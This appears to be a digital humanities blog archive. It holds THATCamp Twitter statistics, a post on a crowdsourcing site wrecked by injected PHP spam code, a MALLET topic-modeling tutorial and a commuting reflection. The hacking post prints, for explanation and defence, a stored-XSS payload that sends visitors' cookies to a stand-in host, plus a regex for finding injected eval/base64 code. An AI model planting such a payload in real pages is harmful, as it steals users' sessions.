amandafrench 2530.589717
openeditionsays 2491.27153
inactinique 2183.450362
briancroxall 2093.876857
piotrr70 2014.064889
brettbobley 1798.013658
miriamkp 1693.203103
melissaterras 1596.42585


Top Replied-To in Entire Graph, by Count
colleengreene 4
thatcamp 3
rosemarysewart 2
normasalim 2
janaremy 2
spagnoloacht 1
chuckrybak 1
lawnsports 1
ncecire 1
academicdave 1
Top Mentioned in Entire Graph, by Count
thatcamp 25
piotrr70 25
briancroxall 17
ncecire 16
spouyllau 14
thtcmpfeminisms 10
marindacos 8
dhlib2012 8
thatcamprtp 7
goldstoneandrew 6
Top URLs in Tweets in Entire Graph, by Count
http://leo.hypotheses.org/9506 26
http://bit.ly/RyrPvA 19
http://tcp.hypotheses.org/609 19
http://tcp.hypotheses.org/programme 15
http://rtp2012.thatcamp.org/apply/ 12
http://bit.ly/w1IFmR 11
http://dhlib2012.thatcamp.org/register/ 10
http://goo.gl/qJ185 10
http://dhlib2012.thatcamp.org/ 8
http://bit.ly/RNHLKO 8
Top Hashtags in Tweets in Entire Graph, by Count
thatcamp 137
mla13 27
dh 22
tcp2012 17
thatcampsocal 12
dhlib2012 9
unconferences 7
thatcamptheory 6
digitalhumanities 6
tcny2012 6

And now the visualization. You can download the zoomable pdf here.

Looking at the modularity in this graph, at first blush you can see quite a North American / European divide, with various satellite outposts. This could of course be because there’s a THATCamp Paris coming down the pipe (lots of French in the tweets).

How I Lost the Crowd: A Tale of Sorrow and Hope

Yesterday, my HeritageCrowd project website was annihilated. Gone. Kaput. Destroyed. Joined the choir.

It is a dead parrot.

This is what I think happened, what I now know and need to learn, and what I think the wider digital humanities community needs to think about/teach each other.

HeritageCrowd was (may be again, if I can salvage from the wreckage) a project that tried to encourage the crowdsourcing of local cultural heritage knowledge for a community that does not have particularly good internet access or penetration. It was built on the Ushahidi platform, which allows folks to participate via cell phone text messages. We even had it set up so that a person could leave a voice message and software would automatically transcribe the message and submit it via email. It worked fairly well, and we wrote it up for Writing History in the Digital Age. I was looking forward to working more on it this summer.

Problem #1: Poor record-keeping of the process of getting things installed, and of the decisions taken.

Now, originally, we were using the Crowdmap hosted version of Ushahidi, so we wouldn’t have to worry about things like security, updates, servers, that sort of thing. But… I wanted to customize the look, move the blocks around, and make some other cosmetic changes so that Ushahidi’s genesis in crisis-mapping wouldn’t be quite as evident. When you repurpose software meant for one domain to another, it’s the sort of thing you do. So, I set up a new domain, got some server space, downloaded Ushahidi and installed it. The installation tested my server skills. Unlike setting up WordPress or Omeka (which I’ve done several times), Ushahidi requires the concomitant set-up of ‘Kohana‘. This was not easy. There are many levels of tacit knowledge in computing, and especially in web-based applications, that I, as an outsider, have not yet learned. It takes a lot of trial and error, and sometimes, just dumb luck. I kept poor records of this period – I was working to a tight deadline, and I wanted to just get the damned thing working. Today, I have no idea what I actually did to get Kohana and Ushahidi playing nice with one another. I think it actually boiled down to file structure.

(It’s funny to think of myself as an outsider, when it comes to all this digital work. I am after all an official, card-carrying ‘digital humanist’. It’s worth remembering what that label actually means. At least one part of it is ‘humanist’. I spent well over a decade learning how to do that part. I’ve only been at the ‘digital’ part since about 2005… and my experience of ‘digital’, at least initially, is in social networks and simulation – things that don’t actually require me to mount materials on the internet. We forget sometimes that there’s more to the digital humanities than building flashy internet-based digital tools. Archaeologists have been using digital methods in their research since the 1960s; Classicists at least that long – and of course Father Busa).

Problem #2: Computers talk to other computers, and persuade them to do things.

I forget where I read it now (it was probably Stephen Ramsay or Geoffrey Rockwell), but digital humanists need to consider artificial intelligence. We do a humanities not just of other humans, but of humans’ creations that engage in their own goal-directed behaviours. As someone who has built a number of agent-based models and simulations, I suppose I shouldn’t have forgotten this. But on the internet, there is a whole netherworld of computers corrupting and enslaving each other, for all sorts of purposes.

HeritageCrowd was destroyed so that one computer could persuade another computer to send spam to gullible humans with erectile dysfunction.

It seems that Ushahidi was vulnerable to ‘Cross-site Request Forgery‘ and ‘Cross-site Scripting‘ attacks. I think what happened to HeritageCrowd was an instance of persistent XSS:

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on “normal” pages returned to other users in the course of regular browsing, without proper HTML escaping.
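To make the quoted definition concrete: if user-submitted text is stored and later echoed into a page without HTML escaping, a script payload runs in every visitor's browser. A toy sketch (illustrative only, nothing to do with Ushahidi's actual code):

```python
# Minimal illustration of persistent XSS and the fix (escape on output).
import html

# An attacker submits this as a "report"; the server stores it verbatim.
submitted = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

# Unsafe: the stored payload is replayed to every visitor and executes.
unsafe_page = "<p>Latest report: " + submitted + "</p>"

# Safe: escape on output, so the browser renders the payload as inert text.
safe_page = "<p>Latest report: " + html.escape(submitted) + "</p>"

print("<script>" in unsafe_page)  # True  -> stored XSS fires
print("<script>" in safe_page)    # False -> rendered harmlessly as text
```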

When I examine every php file on the site, I find all sorts of injected base64 code. So this is what killed my site. Once my site started flooding spam all over the place, the internet’s immune systems (my host’s own, and others) shut it all down. Now, I could just clean everything out and reinstall, but there’s a more devastating issue: it appears my SQL database is gone. Destroyed. Erased. No longer present. I’ve asked my host to help confirm that, because at this point, I’m way out of my league. Hey all you lone digital humanists: how often does your computing services department help you out in this regard? Find someone at your institution who can handle this kind of thing. We can’t wear every hat. I’ve been a one-man band for so long, I’m a bit like the guy in Shawshank Redemption who asks his boss at the supermarket for permission to go to the bathroom. Old habits are hard to break.
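For what it's worth, that triage can be sketched in a few lines: walk the site's tree and flag any php file containing the telltale eval(base64_decode(...)) pattern. The pattern here is a common injection signature, an illustrative assumption rather than the exact payload that hit HeritageCrowd:

```python
# Walk a (presumably compromised) site tree and flag php files that
# contain the classic injected eval/base64_decode pattern.
import os
import re

INJECTION = re.compile(r'eval\s*\(\s*base64_decode\s*\(')

def find_infected(root):
    """Return paths of php files under root that match the injection pattern."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="ignore") as fh:
                if INJECTION.search(fh.read()):
                    hits.append(path)
    return hits
```

A clean reinstall still beats trying to hand-disinfect the matches, since obfuscated payloads can hide in files this simple pattern misses.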

Problem #3: Security Warnings

There are many Ushahidi installations all over the world, and they deal with some pretty sensitive stuff. Security is therefore something Ushahidi takes seriously. I should’ve too. I was not subscribed to the Ushahidi Security Advisories. The hardest pill to swallow is when you know it’s your own damned fault. The warning was there; heed the warnings! Schedule time into every week to keep on top of security. If you’ve got a team, task someone to look after this. I have lots of excuses – it was end of term, things were due, meetings to be held, grades to get in – but it was my responsibility. And I dropped the ball.

Problem #4: Backups

This is the most embarrassing to admit. I did not back things up regularly. I am not ever making that mistake again. Over on Looted Heritage, I have an IFTTT recipe set up that sends every new report to BufferApp, which then tweets it. I’ve also got one that sends every report to Evernote. There are probably more elegant ways to do this. But the worst would be to remind myself to manually download things. That didn’t work the first time. It ain’t gonna work the next.
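The habit I should have had can be sketched as a tiny script that a cron job runs daily, rather than a reminder to myself. The database name, user, and paths below are placeholders, not my real credentials, and mysqldump is assumed to be on the path:

```python
# Build (and optionally run) a dated mysqldump backup command,
# so the database gets dumped on a schedule instead of "when I remember".
import datetime
import subprocess

def backup_command(db, user, out_dir):
    """Assemble the mysqldump invocation for a dated backup file."""
    stamp = datetime.date.today().isoformat()
    out_file = f"{out_dir}/{db}-{stamp}.sql"
    return ["mysqldump", "-u", user, db, f"--result-file={out_file}"], out_file

cmd, out_file = backup_command("heritagecrowd", "admin", "/home/backups")
# subprocess.run(cmd, check=True)   # cron this daily; check that it actually ran
```

Copying the dump somewhere off the server matters too; a backup sitting beside the database dies with it.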

So what do I do now?

If I can get my database back, I’ll clean everything out and reinstall, and then progress onwards wiser for the experience. If I can’t… well, perhaps that’s the end of HeritageCrowd. It was always an experiment, and as Scott Weingart reminds us,

The best we can do is not as much as we can, but as much as we need. There is a point of diminishing return for data collection; that point at which you can’t measure the coastline fast enough before the tides change it. We as humanists have to become comfortable with incompleteness and imperfection, and trust that in aggregate those data can still tell us something, even if they can’t reveal everything.

The HeritageCrowd project taught me quite a lot about crowdsourcing cultural heritage, about building communities, about the problems, potentials, and perils of data management. Even in its (quite probable) death, I’ve learned some hard lessons. I share them here so that you don’t have to make the same mistakes. Make new ones! Share them! The next time I go to THATCamp, I know what I’ll be proposing. I want a session on the Black Hats, and the dark side of the force. I want to know what the resources are for learning how they work, what I can do to protect myself, and frankly, more about the social and cultural anthropology of their world. Perhaps there is space in the Digital Humanities for that.


When I discovered what had happened, I tweeted about it. Thank you everyone who responded with help and advice. That’s the final lesson I think, about this episode. Don’t be afraid to share your failures, and ask for help. As Bethany wrote some time ago, we’re at that point where we’re building the new ways of knowing for the future, just like the Lunaticks in the 18th century. Embrace your inner Lunatick:

Those 18th-century Lunaticks weren’t about the really big theories and breakthroughs – instead, their heroic work was to codify knowledge, found professional societies and journals, and build all the enabling infrastructure that benefited a succeeding generation of scholars and scientists.


if you agree with me that there’s something remarkable about a generation of trained scholars ready to subsume themselves in collaborative endeavors, to do the grunt work, and to step back from the podium into roles only they can play – that is, to become systems-builders for the humanities — then we might also just pause to appreciate and celebrate, and to use “#alt-ac” as a safe place for people to say, “I’m a Lunatick, too.”

Perhaps my role is to fail gloriously & often, so you don’t have to. I’m ok with that.

Getting Started with MALLET and Topic Modeling

UPDATE! September 19th 2012: Scott Weingart, Ian Milligan, and I have written an expanded ‘how to get started with Topic Modeling and MALLET’ for the Programming Historian 2. Please do consult that piece for detailed step-by-step instructions for getting the software installed, getting your data into it, and thinking through what the results might mean.

Original Post that Inspired It All:

I’m very interested in topic modeling at the moment. It has not been easy however to get started – I owe a debt of thanks to Rob Nelson for helping me to get going. In the interests of giving other folks a boost, of paying it forward, I’ll share my recipe. I’m also doing this for the benefit of some of my students. Let’s get cracking!

First, some background reading:

  1. Clay Templeton, “Topic Modeling in the Humanities: An Overview”, Maryland Institute for Technology in the Humanities, n.d., http://mith.umd.edu/topic-modeling-in-the-humanities-an-overview/.
  2. Rob Nelson, Mining the Dispatch, http://dsl.richmond.edu/dispatch/.
  3. Cameron Blevins, “Topic Modeling Martha Ballard’s Diary”, Historying, April 1, 2010, http://historying.org/2010/04/01/topic-modeling-martha-ballards-diary/.
  4. David J. Newman and Sharon Block, “Probabilistic topic decomposition of an eighteenth‐century American newspaper”, Journal of the American Society for Information Science and Technology 57, no. 6 (April 2006): 753-767.
  5. David Blei, Andrew Ng, and Michael Jordan, “Latent Dirichlet allocation”, The Journal of Machine Learning Research 3 (2003), http://dl.acm.org/citation.cfm?id=944937.

Now you’ll need the software. Go to the MALLET project page, and download Mallet. (Mallet was developed by Andrew McCallum at U Massachusetts, Amherst).

Then, you’ll need the Java developer’s kit – nb, not the regular Java that’s on every computer, but the one that lets you program things. Install this.

Unzip Mallet into your C:/ directory. This is important; it can’t be anywhere else. You’ll then have a folder called C:/mallet-2.0.6 or similar.

Next, you’ll need to create an environment variable called MALLET_HOME. You do this by clicking on control panel >> system >> advanced system settings (in Windows 7; for XP, see this article), ‘environment variables’. In the pop-up, click ‘new’ and type MALLET_HOME in the variable name box; type c:/mallet-2.0.6 (i.e., the exact location where you unzipped Mallet) in variable value.

To run Mallet, click on your start menu >> all programs >> accessories >> command prompt. You’ll get the command prompt window, which will have a cursor at c:\user\user> (or similar). Type cd .. (two periods; that ain’t a typo) to go up a level; keep doing this until you’re at C:\. Then type cd mallet-2.0.6 and you’re in the Mallet directory. You can now type Mallet commands directly. If you type bin\mallet at this point, you should be presented with a list of Mallet commands – congratulations!

At this point, you’ll want some data. Using the regular Windows Explorer, I create a folder within Mallet where I put all of the data I want to study (let’s call it ‘data’). If I were to study someone’s diary, I’d create a unique text file for each entry, naming the text file with the entry’s date. Then, following the topic modeling instructions on the Mallet page, I’d import that folder, and see what happens next. I’ve got a workflow for scraping data from websites and other repositories, but I’ll leave that for another day (or skip ahead to The Programming Historian for one way of going about it).
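That one-file-per-entry prep step can be sketched in Python. This assumes each diary entry begins with an ISO-style date (YYYY-MM-DD) on its own line; your source will likely need a different pattern:

```python
# Split one big diary file into a text file per entry, named by the
# entry's date, ready for Mallet's import-dir command.
import os
import re

def split_diary(text, out_dir):
    """Write one dated .txt file per entry; return the paths written."""
    os.makedirs(out_dir, exist_ok=True)
    # Assumption: each entry starts with a YYYY-MM-DD date on its own line.
    parts = re.split(r'^(\d{4}-\d{2}-\d{2})\s*$', text, flags=re.M)
    written = []
    # re.split with a capture group yields [preamble, date1, body1, date2, body2, ...]
    for date, body in zip(parts[1::2], parts[2::2]):
        path = os.path.join(out_dir, date + ".txt")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body.strip())
        written.append(path)
    return written
```

Point the function's out_dir at the 'data' folder inside Mallet and the import command below picks the files up directly.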

Once you’ve imported your documents, Mallet creates a single ‘mallet’ file that you then manipulate to determine topics.

bin\mallet import-dir --input data\johndoediary --output johndoediary.mallet --keep-sequence --remove-stopwords

(modified from the Mallet topic modeling page)

This sequence of commands tells Mallet to import a directory located in the subfolder ‘data’ called ‘johndoediary’ (which contains a sequence of txt files). It then outputs that data into a file we’re calling ‘johndoediary.mallet’. Removing stopwords strips out ‘and’, ‘of’, ‘the’, etc.

Then we’re ready to find some topics:

bin\mallet train-topics --input johndoediary.mallet --num-topics 100 --output-state topic-state.gz --output-topic-keys johndoediary_keys.txt --output-doc-topics johndoediary_composition.txt

(modified from the Mallet topic modeling page)

Now, there are more complicated things you can do with this – take a look at the documentation on the Mallet page. Is there a ‘natural’ number of topics? I do not know. What I have found is that I have to run the train-topics with varying numbers of topics to see how the composition file breaks down. If I end up with the majority of my original texts all in a very limited number of topics, then I need to increase the number of topics; my settings were too coarse.
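The "how does the composition file break down" check can itself be scripted. This sketch assumes the tab-separated layout of Mallet 2.0.x's --output-doc-topics file (doc number, source file, then topic/proportion pairs sorted by proportion, so the third field is each document's dominant topic); eyeball your own file before trusting it:

```python
# Tally each document's dominant topic from Mallet's composition file.
# If most documents pile into a handful of topics, re-run train-topics
# with a larger --num-topics.
from collections import Counter

def dominant_topics(composition_path):
    """Count how many documents have each topic as their best match."""
    counts = Counter()
    with open(composition_path, encoding="utf-8") as fh:
        for line in fh:
            if line.startswith("#"):      # skip the header comment line
                continue
            fields = line.rstrip("\n").split("\t")
            counts[fields[2]] += 1        # third field: top-ranked topic id
    return counts
```

If, say, 90 of 100 diary entries land in the same three topics, the settings were too coarse; bump the topic count and train again.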

More on interpreting the output of Mallet to follow.

Again, I owe an enormous debt of gratitude to Rob Nelson for talking me through the intricacies of getting Mallet to work, and for the record, I think the work he is doing is tremendously important and fascinating!

I know that I know nothing

Commuting in Ottawa is an interesting experience. It seems the entire city disappears in the summer, beguiling one into thinking that a commute that takes 30 – 40 minutes in August will continue to be 30 – 40 minutes in September.

This morning, I was pushing 1 hr and 40 minutes. On the plus side, this gives me the opportunity to listen to the podcasts from Scholars’ Lab, from the University of Virginia (available via iTunes U).  As I listen to this excellent series of talks (one talk per commute…) I realize just how profoundly shallow my knowledge is of the latest happenings in Digital Humanities – and that’s a good thing! For instance, I learned about Intrasis, a system from Sweden for recording archaeological sites (or indeed, any kind of knowledge) that focuses on generating relationships from the data, rather than specifying beforehand a relationships table (and it melds very well with GIS). This is cool. I learned also about Heurist, a tool for managing research.  Also ‘Heml’ – the Historical Event Markup and Linking Project, led by Bruce Robertson. As I listened to this last talk, as Bruce described the problems of marking up events/places/persons using non-Gregorian calendars and so on, it struck me that this problem was rather similar to the one of defining sites in a GIS – what do you do when the boundaries are fuzzy? How do you avoid the in-built precision of dots-on-a-map, or URLs that lead to one specific location? Time is Space, as Einstein taught us….

The upshot is, I feel very humbled when I listen to these in-depth and fascinating talks – I feel rather out of my depth. At the same time, I am excited to be able to participate in such a fast moving field.  Hopefully, my small contributions to agent modeling for history generate the same kind of excitement for others!